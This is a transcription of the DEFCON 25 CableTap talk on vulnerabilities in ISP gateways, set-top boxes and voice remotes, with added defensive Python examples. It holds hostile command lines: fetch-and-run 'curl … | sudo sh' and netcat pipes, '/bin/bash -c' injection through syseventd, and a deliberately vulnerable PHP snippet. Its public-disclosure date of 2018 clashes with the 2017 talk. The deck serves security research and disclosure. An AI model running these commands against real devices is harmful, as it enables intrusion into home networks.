DEFCON 25 Marc Newlin CableTap Slides

CableTap
Wirelessly Tapping your home network

MARC NEWLIN (@MARCNEWLIN)
LOGAN LAMB (LOGAN@BASTILLE.IO)
CHRIS GRAYSON (@_LAVALAMP)
WELCOME TO THE
LINECON AFTER-PARTY.
MARC NEWLIN
(@marcnewlin)
WIRELESS SECURITY RESEARCHER @ BASTILLE NETWORKS
CHRISTOPHER GRAYSON
(@_lavalamp)
FOUNDER/PRINCIPAL ENGINEER @ WEB SIGHT
LOGAN LAMB
(logan@bastille.io)
RESEARCHER @ BASTILLE NETWORKS
What is
CableTap?

• 26 CVEs
• ISP-provided wireless gateways, set-top boxes, and voice remotes
• Cisco, Arris, Technicolor, Motorola, Xfinity (voice remote)
• Multiple unauthenticated RCE attack chains
• Network / application vulnerabilities
• Wi-Fi vulnerabilities
• ZigBee RF4CE vulnerabilities
Why does CableTap matter?

• Full compromise of affected devices
• Wide impact
  • ISP vulnerabilities
  • Vendor vulnerabilities
  • RDK vulnerabilities (software stack used by many major ISPs)
• Attack chains affecting Comcast XFINITY devices have been patched
AGENDA
1. Background on RDK
2. RDK-based devices
3. Progression of research
4. Vulnerabilities
5. Disclosure process
6. Q&A
Background
on RDK.
REFERENCE DEVELOPMENT KIT (RDK)
• “a standardized software stack with localization plugins created to accelerate the deployment of next-gen video products and services by multichannel video providers (MVPDs).”
• Founded in 2012
• Standardized software stack for modems, set top boxes, media devices
https://rdkcentral.com/
YAY OPEN SOURCE (?) SOFTWARE!
An open-source, community-driven project available at: https://code.rdkcentral.com/
But wait what’s this WHOIS record?
Ohhhh that sinking feeling in the pit of my stomach…

YEAH BUT WHO NEEDS PATCHES ANYHOO
• There’s the open source version, then there’s the versions deployed on deployed devices
• Lots of vulns patched in the open source repo
• Patches take months to deploy, no CVEs filed for, no disclosure to affected customers
• Still faster to deploy patches with RDK than non-standardized “native” stacks
• RCE, XSS, XSRF, you name it they got it
RDK-Based Devices

RDK DEVICES
● RDK-V (Video)
  ○ set-top boxes
● RDK-B (Broadband)
  ○ gateways

GENERAL RDK FEATURES
Remote Management Subsystem
Diagnostics
Security Subsystem
Media Framework
• Embedded Linux
• Lots of IO
  • AV/Ethernet/Coax/USB/eSata
• Media Framework uses Webkit
• Supports keyboard and mouse
• More pictures: https://fccid.io/ACQ-XG1
RDK-BROADBAND (GATEWAY)
[Figure: Modem (Network Processor) | Router (Application Processor) | Gateway]

RDK-BROADBAND
• Two systems on one board (Annotated dpc3939 internals here)
• Inter-processor communication over a switch
• Intel Puma
• Network Processor - ARM core
• Application Processor - Intel Atom
• Generally has two serial ports active

RDK-B ENGINEER STANDPOINT
Progression of Research

MARC LEARNS TO NETCAT
Project inspiration (Peter Geissler’s talk @ HITB)
Connecting with Chris
Prior Comcast customer (Marc’s ISP)
“Beyond your cable modem” 32C3 talk
“How do I webapp security plz?”
Pulling off the filesystem using the previously disclosed web UI ping vuln
Digging into the RDK repos

GETTING SERIOUS
Finding some vulns and getting serious
Bringing the side project to Bastille
Bringing Logan into the fold
Hardware and embedded hacking expertise
Expanding to set-top boxes
Disclosing to vendors as new vulnerabilities are found
Vulnerabilities
VULNS - HIDDEN HOME SECURITY WIFI
Home security service offered by many ISPs
Touchscreen control panel connects over WiFi
Hidden WiFi network runs on the customer’s gateway
SSID and passphrase generated based on the CM MAC
Hidden WiFi network, previously documented online
Web UI access point index “hack”
XHS-XXXXXXXX SSID format, based on CM MAC
Grepping around for “calculate” “generate” “key” “psk” etc

VULNS - HIDDEN HOME SECURITY WIFI
CalculatePSKKey in <some binary>
Cross compiling for big-endian ARM and running a keygen binary on the gateway
Guesswork yielding the CM MAC input and PSK key output
Command line binary observed on some devices
How to get the CM MAC??

VULNS - DHCP ACK CM MAC LEAK
1. Connect to “xfinitywifi” network
2. CM MAC of the wireless gateway is included in the DHCP ACK
3. Generate hidden home security network SSID and passphrase
VULNS - IPV6 MULTICAST CM MAC LEAK
1. Sniff the 802.11 channel used by the target wireless gateway
2. Every ~4 seconds, a 156-byte IPv6 multicast packet is transmitted with the l2sd0.500 interface MAC address
3. Translate the l2sd0.500 MAC to the CM MAC
4. Generate hidden home security network SSID and passphrase
Example translation:
11:22:33:44:55:66 - l2sd0.500
0F:22:33:44:55:63 - CM MAC
VULNS - eMTA FQDN CM MAC LEAK
1. mta0 (VoIP) interface has an FQDN containing the mta0 MAC: m001122334455.atlt6.ga.comcast.net
2. Translate the mta0 MAC into the CM MAC: 00:11:22:33:44:53 <-- last octet decreased by 2
3. Generate hidden home security network SSID and passphrase
VULNS - IPV6 ADDRESSING FROM CM MACS
[Figure: Global IPv6 / Link-local IPv6]
Given the following inputs:
Region identifier: 40:11 (Atlanta)
Unknown octet: 53 (can be brute forced)
MAC address: 11:22:33:44:55:66
The following wan0 IPv6 address is generated:
2001:0558:4011:0053:1122:33FF:FE44:5566
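The derivation on this slide, carried through in Python as an added example (this is not code from the CableTap slides or their repo). It builds the wan0 address from the slide's three inputs exactly as the slide shows them: the MAC with ff:fe inserted in the middle and, unlike standard EUI-64, no universal/local bit flip. That detail is taken from the slide's example address, not from any RDK source, and is an assumption about how the gateway actually does it. The second function is the defender-side check: given an address, report whether it embeds a MAC at all, which is the property that makes such addresses predictable.

```python
"""Added example, not from the CableTap slides: wan0 IPv6 from a CM MAC, and
the reverse check for a MAC embedded in an address."""
import ipaddress


def parse_mac(mac):
    """'11:22:33:44:55:66' -> 6 raw bytes (also accepts '-' separators)."""
    parts = mac.replace("-", ":").split(":")
    if len(parts) != 6:
        raise ValueError("MAC must have six octets: %r" % mac)
    return bytes(int(p, 16) for p in parts)


def format_mac(raw):
    return ":".join("%02x" % b for b in raw)


def wan0_ipv6_from_cm_mac(region, unknown_octet, cm_mac):
    """Rebuild the slide's address: 2001:0558:<region>:00<octet>:<MAC with ff:fe inserted>.

    The slide's example keeps the MAC's first octet unchanged (0x11 -> 1122),
    so this function deliberately skips the EUI-64 universal/local bit flip
    (assumption taken from the slide's example, not from RDK source).
    Returns the exploded (uncompressed, lowercase) form for easy comparison.
    """
    region_hex = region.replace(":", "")
    if len(region_hex) != 4 or not 0 <= unknown_octet <= 0xFF:
        raise ValueError("region must be two octets and unknown_octet one octet")
    mac = parse_mac(cm_mac)
    interface_id = mac[:3] + b"\xff\xfe" + mac[3:]
    packed = bytes.fromhex("20010558" + region_hex) + bytes([0, unknown_octet]) + interface_id
    return ipaddress.IPv6Address(packed).exploded


def embedded_mac(addr):
    """Return the MAC embedded in addr's interface identifier (ff:fe marker in
    the middle), or None. A defender can run this over a gateway's WAN
    addresses to see whether they expose a hardware address."""
    iid = ipaddress.IPv6Address(addr).packed[8:]
    if iid[3:5] != b"\xff\xfe":
        return None
    return format_mac(iid[:3] + iid[5:])


if __name__ == "__main__":
    addr = wan0_ipv6_from_cm_mac("40:11", 0x53, "11:22:33:44:55:66")
    print(addr)                # 2001:0558:4011:0053:1122:33ff:fe44:5566
    print(embedded_mac(addr))  # 11:22:33:44:55:66
```

The mitigation this points at is the standard one: WAN addresses should come from random or privacy-extension interface identifiers rather than from a hardware address, so that nothing observable on the WAN side ties back to the CM MAC.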
COMCAST VS PUBLIC INTERNET DEVICE ACCESS
Web UI supports MSO login from WAN only
SSH service from WAN only
Internet-facing network configuration appears well locked-down
XFINITY SEND-TO-TV
Xfinity customer signs in with their account credentials
Web app accepts URL
Set-top box displays URL in a web browser

VULNS - XFINITY SEND-TO-TV / REMOTE WEB UI
Gateway web UI accepts remote requests from Comcast infrastructure
MSO login using the POTD
Alternative hard-coded credentials
IPv6 address of target gateway provides remote web UI access via set-top box

VULNS - POTD
“Password of the day” can be generated on a wireless gateway
Used for remote web UI authentication
Used for remote SSH authentication
VULNS - FREE INTERNET
• Public wifi access points run by ISPs
• e.g. “CableWiFi”, “xfinitywifi”, etc
• APs are on customer equipment or ISP equipment
• Customer logs into their ISP account to get access
• MAC address is remembered for future access
• Attacker can spoof the MAC
• Free Internet on other public access points
• “xfinitywifi” usage does not count toward a customer’s account

SEND-TO-TV ATTACK DEMO
IT’S LIKE CGI, BUT FAST & W/ EXPLOITS
• FastCGI – successor to the Common Gateway Interface (CGI) protocol
• Authored in 1996
• Enables web servers to invoke other processes – birth of dynamic generation of web content
• No RFC, only documentation from MIT .edu site
• Responder, Authorizer, and Filter modes of operation
PHP FASTCGI PROCESS MANAGER (PHP-FPM)
• PHP + FastCGI – what could possibly go wrong?!
• Lets you reconfigure PHP settings on every request
• HTTP POST data supplied via STDIN FastCGI parameter
• If only there were abusable PHP configuration values…

PIECING THINGS TOGETHER
• We can…
  • Reconfigure the PHP interpreter to include an arbitrary file
  • Supply data to STDIN via HTTP POST
• But how do we include STDIN?
• PHP TO THE RESCUE!
  • php://stdin
ISN’T THIS OLD NEWS?
• Yes… Kind of (CVE-2012-1823)
• Previous work was on exploiting the PHP-CGI binary residing within a web directory
• But what if the PHP-CGI binary is bound to a network port?
• Nmap sees as tcpwrapped (TCP 1026-1029)
• Scripts for detection included in CableTap code repo
[Chart: 37,449 PHPFPM servers on port 1026 (IPv4 address space)]
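The two slides above describe PHP-FPM honouring per-request interpreter settings sent as FastCGI parameters and the php://stdin stream that turns POST data into code. The added example below (my code, not the CableTap detection scripts or any RDK component) is the defender's counterpart: a small FastCGI record parser that decodes FCGI_PARAMS name/value pairs from a byte stream and flags the two things a monitor in front of a network-exposed PHP-FPM would want to see, a client-supplied PHP_VALUE/PHP_ADMIN_VALUE parameter and any value referencing php://stdin. The record and length encodings follow the FastCGI specification; the sample stream is constructed inline, not captured traffic, and its parameter values are placeholders.

```python
"""Added example (not from the CableTap slides or their detection scripts):
decode the FCGI_PARAMS records of a FastCGI request and flag parameters
that reconfigure the PHP interpreter or reference php://stdin."""
import struct

FCGI_PARAMS = 4                                   # record type for name/value pairs
RECONFIG_KEYS = {"PHP_VALUE", "PHP_ADMIN_VALUE"}  # php-fpm applies these per request


def fcgi_records(stream):
    """Yield (type, request_id, content) for each record in a raw byte stream.
    Header layout (FastCGI spec): version, type, requestId, contentLength,
    paddingLength, reserved = 8 bytes, big-endian."""
    off = 0
    while off + 8 <= len(stream):
        _ver, rtype, req_id, clen, plen, _res = struct.unpack("!BBHHBB", stream[off:off + 8])
        body = stream[off + 8:off + 8 + clen]
        if len(body) != clen:
            raise ValueError("truncated FastCGI record at offset %d" % off)
        yield rtype, req_id, body
        off += 8 + clen + plen


def _read_len(buf, off):
    # lengths below 128 use one byte; otherwise four bytes with the top bit set
    if buf[off] & 0x80:
        return struct.unpack("!I", buf[off:off + 4])[0] & 0x7FFFFFFF, off + 4
    return buf[off], off + 1


def decode_params(content):
    """Name/value pairs of one FCGI_PARAMS record as a dict."""
    params, off = {}, 0
    while off < len(content):
        nlen, off = _read_len(content, off)
        vlen, off = _read_len(content, off)
        name = content[off:off + nlen].decode("latin-1")
        off += nlen
        value = content[off:off + vlen].decode("latin-1")
        off += vlen
        params[name] = value
    return params


def suspicious_params(stream):
    """Return human-readable findings for a captured FastCGI stream."""
    findings = []
    for rtype, _req_id, body in fcgi_records(stream):
        if rtype != FCGI_PARAMS or not body:  # an empty PARAMS record just ends the list
            continue
        for name, value in decode_params(body).items():
            if name in RECONFIG_KEYS:
                findings.append("%s supplied by client: %r" % (name, value))
            if "php://stdin" in value.lower():
                findings.append("%s references php://stdin" % name)
    return findings


# --- constructed sample, not captured traffic (ASCII names/values) -----------
def _encode_len(n):
    return bytes([n]) if n < 128 else struct.pack("!I", n | 0x80000000)


def build_params_record(params, req_id=1):
    """Encode one FCGI_PARAMS record (used here only to build the sample)."""
    body = b"".join(_encode_len(len(k)) + _encode_len(len(v)) + k.encode() + v.encode()
                    for k, v in params.items())
    pad = (-len(body)) % 8
    return struct.pack("!BBHHBB", 1, FCGI_PARAMS, req_id, len(body), pad, 0) + body + b"\0" * pad


SAMPLE = build_params_record({
    "REQUEST_METHOD": "POST",
    "SCRIPT_FILENAME": "/www/index.php",
    "PHP_ADMIN_VALUE": "display_errors=0",   # interpreter setting pushed by the client
    "DOCUMENT_URI": "php://stdin",            # constructed value using the slide's stream name
}) + build_params_record({})                  # empty record terminates the PARAMS stream

if __name__ == "__main__":
    for finding in suspicious_params(SAMPLE):
        print(finding)
```

In a deployment the same check belongs in the web server configuration rather than in a monitor: a PHP-FPM socket should only be reachable from the front-end web server, and that server should never forward client-controlled headers as PHP_VALUE or PHP_ADMIN_VALUE parameters.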
A TWIST IN RDK’S PHPFPM
• PHPFPM on the RDK deployments we tested had the PHP configuration component stripped out
• No publicly-available documentation as to how to do this – why was it removed?
• Could still gain code execution by referencing PHP files on the system and bypassing control flow guards in the default web app
SYSEVENTD – RCE AS A SERVICE (RAAS)
• Binary protocol listener on TCP 52,367 (all interfaces)
• Not the same as Oracle syseventd!
• Intended for firing off commands based on system events (logging??)
• No auth, no nothing!
SYSEVENTD USAGE
1. Create an event with a name and a binary to call upon event occurrence (name must be a file path)
   $ sysevent --port 52367 --ip 172.16.12.1 async </path/to/file> /bin/cp
2. Trigger the event by touching the event name file path and providing an argument
   $ sysevent --port 52367 --ip 172.16.12.1 set </path/to/file> /var/IGD/<file>
3. Binary is called with event name and arguments passed to command via execv
   $ /bin/cp </path/to/file> /var/IGD/</file>
SYSEVENTD (AB)USAGE
• Create an event with a target process of /bin/bash and an event name of -c
• Trigger the event with a value of the bash command to run
• ???
• Profit
/bin/cp /foo/bbhm_cur_cfg.xml /bar/baz/bbhm_cur_cfg.xml
/bin/bash –c “<commands to execute>”
WHERE THE SYSEVENTD AT?!
• Bound to all interfaces
• Sometimes not firewalled off from public-facing IP address
• Otherwise exposed to plenty of the LAN IPs
[Chart: 149,162 Syseventd services on TCP 52,367 (IPv4 address space)]
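The exposure described on this slide comes down to an unauthenticated service bound to every interface. The added example below (my code, not from the CableTap repo or RDK) is the check an engineer with a shell on an embedded Linux box would run: parse /proc/net/tcp, keep only sockets in LISTEN state bound to 0.0.0.0, and label the ports the slides name (PHP-FPM on 1026-1029, syseventd on 52367). The /proc/net/tcp sample is constructed here, not taken from a real gateway; the hex address format (little-endian IPv4, big-endian port, state 0A for LISTEN) is the kernel's documented layout.

```python
"""Added example (not from the CableTap slides): report TCP listeners bound to
all interfaces from /proc/net/tcp-style text, labelling the ports the slides
name. The sample below is constructed, not captured from a gateway."""
SENSITIVE_PORTS = {
    52367: "syseventd",                     # binary RPC listener from the slides
    1026: "php-fpm", 1027: "php-fpm", 1028: "php-fpm", 1029: "php-fpm",
}
TCP_LISTEN = "0A"   # 'st' column value for a listening socket


def parse_proc_net_tcp(text):
    """Yield (local_ip, local_port, state) per socket line; header is skipped."""
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 4:
            continue
        ip_hex, port_hex = fields[1].split(":")
        # the kernel prints the IPv4 address as 8 hex digits, least significant byte first
        ip = ".".join(str(int(ip_hex[i:i + 2], 16)) for i in (6, 4, 2, 0))
        yield ip, int(port_hex, 16), fields[3]


def exposed_listeners(text):
    """Sorted (port, label) pairs for listeners bound to INADDR_ANY (0.0.0.0).
    Loopback- or LAN-bound listeners are not reported."""
    findings = []
    for ip, port, state in parse_proc_net_tcp(text):
        if state != TCP_LISTEN or ip != "0.0.0.0":
            continue
        findings.append((port, SENSITIVE_PORTS.get(port, "unknown")))
    return sorted(findings)


# Constructed sample: syseventd and php-fpm on 0.0.0.0, sshd on loopback only,
# plus one established connection that must be ignored.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:CC8F 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1235 1 0000000000000000 100 0 0 10 0
   2: 00000000:0402 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1236 1 0000000000000000 100 0 0 10 0
   3: 0100000A:0050 0200000A:C000 01 00000000:00000000 00:00000000 00000000     0        0 1237 1 0000000000000000 100 0 0 10 0
"""

if __name__ == "__main__":
    for port, label in exposed_listeners(SAMPLE_PROC_NET_TCP):
        print("0.0.0.0:%d (%s) is reachable on every interface" % (port, label))
```

On a real device the text would come from `open("/proc/net/tcp").read()`. Anything this reports that is meant for local IPC should be rebound to 127.0.0.1 or the inter-processor link, and the remainder blocked from the WAN and guest interfaces by the firewall; the slide's chart of Internet-reachable syseventd instances is what happens when neither is done.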
A TALE OF TWO OPERATING SYSTEMS
• Two operating systems on the board
• One ARM (modem w/ web app) and one Atom (router)
• Modem is at bottom of range (10.0.0.1) and Atom is at top of range (10.0.0.254)
I MAKE MY OWN ROUTES DAMMIT
• Atom OS has an interface allocated in 169.254.0.0/16 range for Dbus
• …You can route to it if you’re into that sort of thing
• Custom RPC service that is quite literally RCE as service, and all that FastCGI goodness
• Once on Atom side, hardcoded root SSH creds to ARM side on 192.168.0.0/16
ip route add 169.254.0.1 via 10.0.0.254
SET-TOP BOX VULNS
Remote web inspector
Arbitrary file read
Root command execution
RF4CE remote force pairing
RF4CE remote force OTA
REMOTE WEB INSPECTOR
Comparable to Firefox and Chrome DevTools, accessible from over the internet
ARBITRARY FILE READ
● Found a route that looked like it was for reading files from the filesystem
● The route is for reading files from the filesystem
ROOT COMMAND EXECUTION
Sanitize your inputs!!!
Sanitize your inputs!!!
Sanitize your inputs!!!
sudo make install
curl http://totallylegit.com | sudo sh
nc -l -p 8080 0.0.0.0 | sudo sh

<?php
// Deliberately vulnerable example from the slide: $name is interpolated
// unescaped into a shell command, so shell metacharacters in the POST body
// run as additional commands.
$name = $_POST["name"];
shell_exec("echo hello $name");
?>
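The slide's PHP snippet, mirrored in Python as an added example (this is my code, not the slides' or the RDK web app's): the same string-interpolation bug beside a hardened version that allowlists the input and passes it as a single argv element so no shell ever parses it. The allowlist pattern and the 64-character limit are assumptions chosen for the example.

```python
"""Added example (not from the CableTap slides): the slide's PHP
shell_exec("echo hello $name") bug, mirrored in Python next to a hardened
version that validates the input and never hands it to a shell."""
import re
import shlex
import subprocess

NAME_ALLOWED = re.compile(r"[A-Za-z0-9 _.'-]{1,64}")   # allowlist (assumed policy), not a blocklist


def greet_vulnerable(name):
    """Same shape as the slide's PHP: the input is spliced into a shell string.
    A name of 'x; echo pwned' becomes two commands."""
    return subprocess.run("echo hello " + name, shell=True,
                          capture_output=True, text=True).stdout


def is_valid_name(name):
    return bool(NAME_ALLOWED.fullmatch(name))


def greet_hardened(name):
    """Reject anything outside the allowlist, then pass the name as a single
    argv element: no shell is involved, so metacharacters are inert."""
    if not is_valid_name(name):
        raise ValueError("name rejected")
    return subprocess.run(["echo", "hello", name],
                          capture_output=True, text=True).stdout


def shell_quoted_command(name):
    """If a shell string truly cannot be avoided, quote the argument so the
    shell sees one word (shown for contrast; argv lists are still preferable)."""
    return "echo hello " + shlex.quote(name)


if __name__ == "__main__":
    print(greet_vulnerable("x; echo pwned"), end="")  # prints hello x, then pwned
    print(greet_hardened("Jane Doe"), end="")          # prints hello Jane Doe
    print(shell_quoted_command("x; echo pwned"))      # echo hello 'x; echo pwned'
```

The same two fixes apply to the PHP original: validate `$_POST["name"]` against an allowlist and, if a command must be run at all, build it with `escapeshellarg()` rather than string interpolation. Running the web app as root, as the slide title implies, turns any such slip into full device compromise, so the process should also be dropped to an unprivileged user.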
VOICE REMOTE OVERVIEW
Control your STB with your voice!
Wireless instead of IR!
Motion activated lights!
TI CC2530 with RF4CE stack

RF4CE OVERVIEW
Zigbee protocol for remote control
Key exchange is unencrypted

RF4CE MSO (OPENCABLE) OVERVIEW
Uses RF4CE
For remote control of cable equipment
Binding process is not rate limited

RF4CE REMOTE FORCED PAIRING
Emulate remote
Entire binding process in under one second
~2 hours to force pair remote

RF4CE REMOTE FORCED OTA
Firmware package ISN’T signed
1) Modify update daemon
2) Modify firmware payload
3) Fix CRC and version
4) OTA :)

Devices & Disclosure
KNOWN AFFECTED DEVICES
Vendor       Model       Type                 Tested ISP        CVE Count
Cisco        DPC3939     Wireless Gateway     Xfinity           16
Cisco        DPC3939B    Wireless Gateway     Comcast Business  13
Technicolor  DPC3941T    Wireless Gateway     Xfinity           11
Arris        TG1682G     Wireless Gateway     Xfinity           12
Technicolor  TC8717T*    Wireless Gateway     Time Warner       1
Motorola     MX011ANM    Set-Top Box          Xfinity           6
Xfinity      XR11-20     ZigBee Voice Remote  Xfinity           1

KNOWN NON-RDK DEVICES
Vendor       Model        Type                              Tested ISP
Arris        TG1682G      Wireless Gateway                  Spectrum
Technicolor  TC8717T      Wireless Gateway                  Mediacom
Technicolor  TC8717T      Wireless Gateway                  Time Warner
Arris        TG2492LG-VM  Wireless Gateway (Super Hub 3.0)  Virgin Media
Compal       CH7465LG-LC  Wireless Gateway (Connect Box)    Unitymedia
Technicolor  TC8305C      Wireless Gateway                  Xfinity
DISCLOSURE TIMELINE
03/27/2017 Group 1 Vendor Disclosures
03/28/2017 Group 2 Vendor Disclosures
04/20/2017 Group 3 Vendor Disclosures
04/28/2017 Group 4 Vendor Disclosures
07/11/2017 Abstract goes live on defcon.org
07/28/2018 Public Disclosure (all groups)

REMEDIATION AND MITIGATION
Unauthenticated RCE attack chains affecting Comcast XFINITY devices have been remediated
Customers of other ISPs should contact their ISP to determine if their hardware is affected by CableTap

FINAL REMARKS
Not enough time to talk about all of the vulnerabilities
Please see our whitepaper for further details <link to whitepaper>
We found a substantial number of vulns, but the most severe have been patched (hooray!)
Q&A
Thank you for watching our talk :)
Thanks to Bastille for supporting our research.
Thanks to Comcast for remediating the unauthenticated RCE attack chains affecting Xfinity-branded devices.

MARC NEWLIN - Bastille Networks - marc@bastille.io - @marcnewlin
LOGAN LAMB - Bastille Networks - logan@bastille.io
CHRIS GRAYSON - Web Sight - chris@websight.io - @_lavalamp
